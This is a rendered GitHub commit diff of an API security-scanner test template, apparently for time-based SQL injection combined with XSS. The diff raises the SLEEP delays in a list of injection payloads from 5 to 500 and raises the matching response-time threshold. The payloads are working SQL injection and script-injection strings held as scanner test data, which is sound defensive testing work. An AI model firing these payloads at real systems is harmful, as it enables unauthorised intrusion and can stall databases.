Skip to content

Commit c7bc58f

Browse files
committed
pro
1 parent 7729533 commit c7bc58f

File tree

1 file changed

+7
-7
lines changed

1 file changed

+7
-7
lines changed

Broken-User-Authentication/TimeBasedSQLiXSSGET.yml

Lines changed: 7 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -76,12 +76,12 @@ api_selection_filters:
7676
extract: userVal
7777
wordLists:
7878
timeBasedPayloads:
79-
- "' AND IF(1=1, SLEEP(5), 0) UNION SELECT null,'<script>alert(\"XSS\");</script>' --"
80-
- "' OR IF(1=1, SLEEP(5), 0) UNION SELECT null,concat('<svg/onload=alert(\"XSS\")>') --"
81-
- "' AND IF(1=1, SLEEP(5), 0) UNION SELECT null,'<img src=\"x\" onerror=\"alert('XSS')\"> --"
82-
- "' OR IF(1=1, SLEEP(5), 0) UNION SELECT null,concat('<script>alert(\"XSS\");</script>') --"
83-
- "' AND IF(1=1, SLEEP(5), 0) UNION SELECT null,'<svg/onload=alert(\"XSS\")>' --"
84-
- "' OR IF(1=1, SLEEP(5), 0) UNION SELECT null,concat('<img src=\"x\" onerror=\"alert('XSS')\">') --"
79+
- "' AND IF(1=1, SLEEP(500), 0) UNION SELECT null,'<script>alert(\"XSS\");</script>' --"
80+
- "' OR IF(1=1, SLEEP(500), 0) UNION SELECT null,concat('<svg/onload=alert(\"XSS\")>') --"
81+
- "' AND IF(1=1, SLEEP(500), 0) UNION SELECT null,'<img src=\"x\" onerror=\"alert('XSS')\"> --"
82+
- "' OR IF(1=1, SLEEP(500), 0) UNION SELECT null,concat('<script>alert(\"XSS\");</script>') --"
83+
- "' AND IF(1=1, SLEEP(500), 0) UNION SELECT null,'<svg/onload=alert(\"XSS\")>' --"
84+
- "' OR IF(1=1, SLEEP(500), 0) UNION SELECT null,concat('<img src=\"x\" onerror=\"alert('XSS')\">') --"
8585
execute:
8686
type: multiple
8787
requests:
@@ -139,7 +139,7 @@ validate:
139139
and:
140140
- compare_greater:
141141
- ${x2.response.stats.median_response_time}
142-
- 5001
142+
- 15001
143143
- compare_greater:
144144
- ${x2.response.stats.median_response_time}
145145
- ${x1.response.stats.median_response_time} * 5

0 commit comments

Comments
 (0)